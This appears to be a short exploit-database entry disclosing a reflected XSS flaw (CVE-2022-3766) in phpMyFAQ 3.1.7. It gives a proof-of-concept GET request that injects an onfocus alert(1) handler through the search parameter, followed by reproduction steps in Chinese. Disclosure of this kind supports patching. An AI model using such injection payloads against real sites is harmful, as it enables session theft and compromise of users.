Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
Date: 2025-11-25
Exploit Author: CodeSecLab
Vendor Homepage: https://github.com/thorsten/phpmyfaq/
Software Link: https://github.com/thorsten/phpmyfaq/
Version: 3.1.7
Tested on: Windows
CVE : CVE-2022-3766
Proof Of Concept
GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29
Additional Conditions:
- 确保没有安全机制(如Web应用防火墙)阻止特定的请求模式。
- 应用程序必须运行phpMyFAQ 3.1.8之前的版本。
Steps to Reproduce
- 登录 phpmyfaq。
- 发送上述请求。
- 观察结果。